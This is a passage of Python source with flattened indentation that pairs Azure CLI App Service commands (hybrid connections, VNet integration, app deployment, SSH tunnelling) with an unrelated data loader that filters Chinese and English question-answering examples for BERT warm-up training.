hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, hc, slot)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
# enures input is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
# reformats the vnet entry, removing unecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None):
SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork')
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnet_id = ''
for v in list_all_vnets:
if v.name == vnet:
vnet_id = v.id
# parsing the arm uri in order to extract vnet_name and vnet_resource_group
vnet_id_strings = vnet_id.split('/')
vnet_resource_group = ''
i = 0
for z in vnet_id_strings:
if z.lower() == "resourcegroups":
vnet_resource_group = vnet_id_strings[i + 1]
i = i + 1
if slot is None:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
else:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
name, slot)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
return logger.warning("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.create_or_update(vnet_resource_group, vnet, subnet,
subnet_parameters=subnetObj)
id_subnet = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
subnet_resource_id = id_subnet.id
swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
swift_supported=True)
if slot is None:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name, name,
swiftVnet)
else:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name, name,
swiftVnet, slot)
# reformats the vnet entry, removing unecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name, resource_group_name=None, plan=None, location=None, sku=None, dryrun=False, logs=False, # pylint: disable=too-many-statements,
launch_browser=False, html=False):
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_create_new_app = does_app_already_exist(cmd, name)
os_name = detect_os_form_src(src_dir, html)
lang_details = get_lang_from_content(src_dir, html)
language = lang_details.get('language')
# detect the version
data = get_runtime_version_details(lang_details.get('file_loc'), language)
version_used_create = data.get('to_create')
detected_version = data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp %s already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app {}. Please check that the app is a part of "
"the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp {} exists in ResourceGroup {} and does not match the value entered {}. Please "
"re-run command with the correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered {} does not match the plan name that the webapp is hosted in {}."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(rg_name, plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp {} is a {} app. The code detected at '{}' will default to "
"'{}'. "
"Please create a new app to continue this operation.".format(name, current_os, src_dir, os))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("webapp %s doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name)
_is_linux = os_name.lower() == 'linux'
_create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux)
plan = get_plan_to_use(cmd, user, os_name, loc, sku, rg_name, _create_new_rg, plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, location)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
# we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
# updated we update those
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=location)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if _is_linux else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
else: # for existing app if we might need to update the stack runtime settings
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
elif os_name.lower() == 'windows' and site_config.windows_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.windows_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, windows_fx_version=runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
# Remove the file after deployment, handling exception if user removed the file manually
try:
os.remove(zip_file_path)
except OSError:
pass
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
def _ping_scm_site(cmd, resource_group, name):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify())
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password)
_ping_scm_site(cmd, resource_group_name, name)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.isAlive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.isAlive() and t.isAlive():
time.sleep(5)
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
raise CLIError('webapp ssh is only supported on linux and mac')
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise CLIError('remote debugging is enabled, please disable')
create_tunnel_and_session(cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout)
def create_devops_pipeline(
cmd,
functionapp_name=None,
organization_name=None,
project_name=None,
repository_name=None,
overwrite_yaml=None,
allow_force_push=None,
github_pat=None,
github_repository=None
):
from .azure_devops_build_interactive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name, repository_name,
overwrite_yaml, allow_force_push,
github_pat, github_repository)
return azure_devops_build_interactive.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku in ['I1', 'I2', 'I3']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and hostname_binding.host_name_type == 'Verified':
verified_hostname_found = True
return verified_hostname_found
|
warmup_dataloader.py
|
import sys
import os
import threading
import numpy as np
import torch
import json
import jieba
import string
import unicodedata
import multiprocessing as mp
#mp.set_start_method('spawn')
from pytorch_pretrained_bert.tokenization import BasicTokenizer, BertTokenizer
from pytorch_pretrained_bert.tokenization import _is_punctuation, _is_whitespace, _is_control
from pytorch_pretrained_bert.dataset_processor import PretrainingProcessor, MRQAExample
from multiprocessing import Process, Queue
from stopwordsiso import stopwords
def move_to_cuda(sample):
if len(sample) == 0:
return {}
def _move_to_cuda(maybe_tensor):
if torch.is_tensor(maybe_tensor):
return maybe_tensor.cuda()
elif isinstance(maybe_tensor, dict):
return {
key: _move_to_cuda(value)
for key, value in maybe_tensor.items()
}
elif isinstance(maybe_tensor, list):
return [_move_to_cuda(x) for x in maybe_tensor]
else:
return maybe_tensor
return _move_to_cuda(sample)
def tokenize(text):
tokens = []
for t in text:
tokens.append(t)
return tokens
def convert_tokens_to_ids(tokens, word2id):
token_ids = []
for idx, f in enumerate(tokens):
token_ids.append(word2id[f] if f in word2id else word2id['[UNK]'])
return token_ids
def multi_process_get_warmup_data_queue_cn(args, start, end, p_list):
def warmup_sample_filter(examples, stopwords, jacc_thres,
do_lower_case, warmup_window_size, max_warmup_query_length,
max_comma_num):
def is_whitespace(c):
if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
return True
cat = unicodedata.category(c)
if cat == "Zs":
return True
return False
assert len(examples) == 1
for example in examples:
if len(example.question_text) >= max_warmup_query_length:
return False, None
if do_lower_case:
example_paragraph_text = example.paragraph_text.lower()
raw_doc_tokens = list(jieba.cut(example_paragraph_text))
else:
example_paragraph_text = example.paragraph_text
raw_doc_tokens = list(jieba.cut(example_paragraph_text))
doc_tokens = []
char_to_word_offset = []
prev_is_whitespace = True
k = 0
temp_word = ""
for c in example_paragraph_text:
temp_word += c
char_to_word_offset.append(k)
if temp_word == raw_doc_tokens[k]:
doc_tokens.append(temp_word)
temp_word = ""
k += 1
if k != len(raw_doc_tokens):
print("raw_doc_tokens", raw_doc_tokens)
print("Warning: paragraph '{}' tokenization error ".format(example.paragraph_text))
return False, None
assert type(example.start_positions) == int and type(example.start_positions) == int
start_tok_position = char_to_word_offset[example.start_positions]
end_tok_position = char_to_word_offset[example.end_positions]
left_bound = max(start_tok_position - warmup_window_size, 0)
right_bound = min(end_tok_position + warmup_window_size, len(raw_doc_tokens))
context_tok_list = (
[tok for tok in
raw_doc_tokens[left_bound: start_tok_position]] +
[tok for tok in
raw_doc_tokens[end_tok_position + 1 : right_bound]]
)
comma_num = sum([1 if tok == '、' else 0
for tok in context_tok_list])
if comma_num >= max_comma_num:
return False, None
context_tok_set = set([tok
for tok in context_tok_list if
not (
(
len(tok) == 1 and (_is_punctuation(tok) or \
_is_whitespace(tok) or _is_control(tok))
)
or tok in stopwords
)])
if do_lower_case:
question_tokens = list(jieba.cut(example.question_text.lower(), cut_all = True))
else:
question_tokens = list(jieba.cut(example.question_text, cut_all = True))
question_tok_set = set([tok
for tok in question_tokens if
not (
(
len(tok) == 1 and (_is_punctuation(tok) or \
_is_whitespace(tok) or _is_control(tok))
)
or tok in stopwords
)])
'''if len(context_tok_set) == 0:
print('question_tok_set', question_tok_set)
print('context_tok_set', context_tok_set)
print('context_tok_list', context_tok_list)
print(left_bound, right_bound)
print(start_tok_position, end_tok_position)
print('raw_doc_tokens', raw_doc_tokens)
#print('jaccard', jaccard)'''
if len(context_tok_set) == 0:
return False, context_tok_set
jaccard = float(len(context_tok_set.intersection(question_tok_set)) / len(context_tok_set))
#print('question_tok_set', question_tok_set)
#print('context_tok_set', context_tok_set)
#print('jaccard', jaccard)
if jaccard >= jacc_thres:
#print("return true")
return True, context_tok_set
else:
#print()
return False, context_tok_set
def enqueue(q_list, offset, start_end_list, process_num, stopwords,
loop = True):
print("train file offset: ", offset)
fi = open(args.train_file, 'rb')
cache = [None] * 10000
first_time = True
tokenizer = BertTokenizer.from_pretrained(
args.tokenizer, do_lower_case=args.do_lower_case)
chunked_start, chunked_end = start_end_list[process_num]
print("chunked_start, chunked_end", chunked_start, chunked_end)
run_to_eof = False
while True:
if first_time:
fi.seek(int(offset))
first_time = False
if chunked_start > chunked_end:
run_to_eof = True
elif run_to_eof and chunked_start > chunked_end:
fi.seek(0)
run_to_eof = False
else:
if not loop:
print("reached the end of loop, flushing the cache...")
for insert_idx in range(len(cache)):
if cache[insert_idx] is not None:
q_list[process_num].put(cache[insert_idx])
q_list[process_num].put({
'feature': None,
'example': None,
'context_tok_set': None,
'finished': True
})
return
fi.seek(int(chunked_start))
if chunked_start > chunked_end:
run_to_eof = True
for line in fi:
if not run_to_eof and fi.tell() >= chunked_end:
break
try:
line = line.rstrip().decode('utf-8')
sample_json = json.loads(line)
except UnicodeDecodeError:
'''print(f"WARNING: one training line decode utf-8 ERROR")
print(line)
sys.stdout.flush()'''
continue
except json.decoder.JSONDecodeError as json_e:
'''print(f"WARNING: json.decoder.JSONDecodeError ERROR")
print(line)
print(json_e)
sys.stdout.flush()'''
continue
data_processor = PretrainingProcessor()
examples = data_processor.read_chinese_examples(
line_list=[line], is_training=True,
first_answer_only=True,
replace_mask="[unused1]",
do_lower_case=args.do_lower_case,
remove_query_in_passage=args.remove_query_in_passage)
if len(examples) == 0:
continue
is_warmup, context_tok_set = warmup_sample_filter(
examples, stopwords,
jacc_thres = args.jacc_thres,
do_lower_case = args.do_lower_case,
warmup_window_size = args.warmup_window_size,
max_warmup_query_length = args.max_warmup_query_length,
max_comma_num = args.max_comma_num
)
if not is_warmup:
continue
train_features = data_processor.convert_chinese_examples_to_features(
examples=examples,
tokenizer=tokenizer,
max_seq_length=args.max_seq_length,
doc_stride=args.doc_stride,
max_query_length=args.max_query_length,
is_training=True,
first_answer_only=True)
for feature in train_features:
insert_idx = np.random.randint(0, len(cache))
if cache[insert_idx] is None:
cache[insert_idx] = {
'feature': feature,
'example': sample_json,
'context_tok_set': context_tok_set,
'finished': False
}
else:
q_list[process_num].put(cache[insert_idx])
cache[insert_idx] = {
'feature': feature,
'example': sample_json,
'context_tok_set': context_tok_set,
'finished': False
}
'''q_list[process_num].put()'''
del line
del sample_json
total_bytes = os.path.getsize(args.train_file)
print("train file total bytes: ", total_bytes)
q_list = [Queue(maxsize=32767) for _ in range(args.enqueue_thread_num)]
chunk_size = ((end - start) // args.enqueue_thread_num if end >= start
else (end - start + total_bytes) // args.enqueue_thread_num)
start_end_list = []
for i in range(args.enqueue_thread_num):
start_end_list.append(
((start + chunk_size * i) % total_bytes,
(start + chunk_size * (i + 1)) % total_bytes)
)
for i in range(args.enqueue_thread_num): # for fine tuning, thread num CAN be set 1.
# offset = i * np.random.rand() * total_bytes / (args.enqueue_thread_num + 1)
chunked_start, chunked_end = start_end_list[i]
#chunked_start = 0
#chunked_end = total_bytes
#offset = chunked_start #np.random.rand() * (end - start) + start
offset = ((np.random.rand() * (chunked_end - chunked_start + total_bytes) + chunked_start) % total_bytes
if chunked_start > chunked_end else
(np.random.rand() * (chunked_end - chunked_start) + chunked_start) % total_bytes)
print("enqueue process started : ", i, offset, offset / total_bytes)
p = Process(target=enqueue, args=(q_list, offset, start_end_list, i, stopwords('zh'), True))
p.start()
p_list.append(p)
return q_list
def multi_process_get_warmup_data_queue_en(args, start, end, p_list):
def warmup_sample_filter(examples, stopwords, jacc_thres,
do_lower_case, warmup_window_size, max_warmup_query_length,
lemmatizer, translator, neg_drop_rate):
def is_whitespace(c):
if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
return True
cat = unicodedata.category(c)
if cat == "Zs":
return True
return False
def space_tokenize(example_paragraph_text):
raw_doc_tokens = []
char_to_word_offset = []
prev_is_whitespace = True
for c in example_paragraph_text.translate(translator):
if is_whitespace(c):
prev_is_whitespace = True
else:
if prev_is_whitespace:
raw_doc_tokens.append(c)
else:
raw_doc_tokens[-1] += c
prev_is_whitespace = False
char_to_word_offset.append(len(raw_doc_tokens) - 1)
return raw_doc_tokens, char_to_word_offset
assert len(examples) == 1
for example in examples:
if (example.orig_answer_text == ''
or example.paragraph_text.find(example.orig_answer_text) == -1):
rand = np.random.uniform(0, 1)
if rand >= neg_drop_rate:
return False, None
if do_lower_case:
example_paragraph_text = example.paragraph_text.strip().lower()
else:
example_paragraph_text = example.paragraph_text.strip()
raw_doc_tokens, char_to_word_offset = space_tokenize(example_paragraph_text)
assert type(example.start_positions) == int and type(example.start_positions) == int
start_tok_position = char_to_word_offset[example.start_positions]
end_tok_position = char_to_word_offset[example.end_positions]
left_bound = max(start_tok_position - warmup_window_size, 0)
right_bound = min(end_tok_position + warmup_window_size, len(raw_doc_tokens))
context_tok_list = (
[tok for tok in
raw_doc_tokens[left_bound: start_tok_position]] +
[tok for tok in
raw_doc_tokens[end_tok_position + 1 : right_bound]]
)
'''comma_num = sum([1 if tok == '、' else 0
for tok in context_tok_list])
if comma_num >= max_comma_num:
return False, None'''
context_tok_set = set([lemmatizer.lemmatize(tok)
for tok in context_tok_list if
not (
(
len(tok) == 1 and (_is_punctuation(tok) or \
_is_whitespace(tok) or _is_control(tok))
)
or tok in stopwords
)])
if do_lower_case:
question_tokens, _ = space_tokenize(example.question_text.lower())
else:
question_tokens, _ = space_tokenize(example.question_text)
if len(question_tokens) >= max_warmup_query_length:
#print(question_tokens)
#print('len---', len(question_tokens))
return False, None
question_tok_set = set([lemmatizer.lemmatize(tok)
for tok in question_tokens if
not (
(
len(tok) == 1 and (_is_punctuation(tok) or \
_is_whitespace(tok) or _is_control(tok))
)
or tok in stopwords
)])
'''if len(context_tok_set) == 0:
print('question_tok_set', question_tok_set)
print('context_tok_set', context_tok_set)
print('context_tok_list', context_tok_list)
print(left_bound, right_bound)
print(start_tok_position, end_tok_position)
print('raw_doc_tokens', raw_doc_tokens)
#print('jaccard', jaccard)'''
if len(context_tok_set) == 0:
return False, context_tok_set
jaccard = float(len(context_tok_set.intersection(question_tok_set)) / len(context_tok_set))
if jaccard >= jacc_thres:
'''print('question_tokens', question_tokens)
print('question_tok_set', question_tok_set)
print('context_tok_list', context_tok_list)
print('context_tok_set', context_tok_set)
print('jaccard', jaccard)'''
return True, context_tok_set
else:
#print()
return False, context_tok_set
def enqueue(q_list, offset, start_end_list, process_num, stopwords,
loop= True):
from nltk.stem import WordNetLemmatizer
print("train file offset: ", offset)
